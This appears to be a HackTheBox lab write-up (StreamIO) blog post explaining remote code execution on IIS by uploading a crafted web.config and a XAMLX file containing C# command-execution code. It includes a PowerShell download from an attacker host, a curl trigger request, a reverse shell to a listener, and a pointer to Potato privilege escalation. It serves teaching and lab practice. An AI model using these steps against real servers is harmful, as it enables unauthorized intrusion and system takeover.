Remote Code Execution in IIS Servers with XAMLX files

In this article I will be going through a technique which allows us to execute commands in MS IIS Servers when files such .ASP and .ASPX are disabled.

For this demo, I will be using the StreamIO box from hackthebox. This was a Medium difficulty, Windows box which had an unintended privilege escalation method of getting administrator using this technique.

NOTE: This unintended was originally showcased by xct, in his walkthrough of the box.

What is an XAMLX file?

This is a special file type that can be used to define workflow services in windows. These workflow activities allows you to send and receive messages from within a workflow. This specifies activities to be implemented by a program and is used for defining how a remote service program runs.

These files can be used to execute system commands upon called through the MS IIS server.

Prerequisites for the Attack

For this attack to be possible, we need a way to upload/write files to the web root ( C:\inetpub\wwwroot )of the IIS server. Also either the .xamlx file extension should be allowed through the HTTP Activation feature of WCF Services under .NET Framework or should be enabled.

In our case, we will be enabling the extension by uploading a new web.config file to the web root. The way we do that is by telling our config to add the .xamlx file extension to allowed extensions.

<add name="xamlx" path="*.xamlx" verb="*" type="System.Xaml.Hosting.XamlHttpHandlerFactory, System.Xaml.Hosting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" modules="ManagedPipelineHandler" requireAccess="Script" preCondition="integratedMode" />                                      <add name="xamlx-Classic" path="*.xamlx" verb="*" modules="IsapiModule" scriptProcessor="%windir%\Microsoft.NET\Framework64\v4.0.30319\aspnet_isapi.dll" requireAccess="Script" preCondition="classicMode,runtimeVersionv4.0,bitness64" />

Once that’s done, we need to create our XAMLX file which will execute commands for us. This file takes the format of XML files. Inside, it uses special tag called <mca:CSharpValue> that allows to execute C# code.

<mca:CSharpValue x:TypeArguments="sd:Process">/*/System.Diagnostics.Process.Start("");return base.RewriteExpressionTree(expression);}                              System.Diagnostics.Process x =System.Diagnostics.Process.Start("cmd.exe", "/c calc");                              [System.Diagnostics.DebuggerHiddenAttribute()]                              public System.Diagnostics.Process @__Expr0Get() {return x;</mca:CSharpValue>

You can find the full versions of the XAMLX file and the web.config file below.

Here in the a.xamlx file I have used a base64 encoded powershell payload to get a reverse shell to listener on 10.10.14.43:9090 Make sure you edit your payload accordingly.

Exploitation

I have a low privileged shell on the box as the yoshihide user with no any interesting privileges.

whoami /priv

But this user has write access over the the web root of the IIS server.

icacls  C:\inetpub\wwwroot

Now we need to upload the XAMLX file and the web.config files to the web root. I am hosting them in my webserver on port 8080 I will use iwr (Invoke-WebRequest) to transfer the files.

powershell iwr http://10.10.14.43:8080/web.config -outfile \inetpub\wwwroot\web.configiwr http://10.10.14.43:8080/a.xamlx -outfile \inetpub\wwwroot\a.xamlx

After files are in place, we need to do a POST request to our XAMLX file. Couple of things to keep in mind are to set the Content-type to text/xml and to set the SOAPAction header.

curl http://streamio.htb/a.xamlx -X POST \
-H 'Content-Type: text/xml' \
-H 'SOAPAction: testme' \
-d '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body/></s:Envelope>'

Once I executed the curl, I got a connection to my listener. But it was as the yoshihide user. Even though, if we look at the privileges we have now, we see that we have SeImpersonatePrivilege

This SeImpersonatePrivilege privilege can be exploited by using something like juicy potato or Sweet Potato to get Administrative access to the system.

Reference

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store

Kavishka Gihan

Cyber Security Student | Machine author in @hackthebox | find me on instagram @_kavi.gihan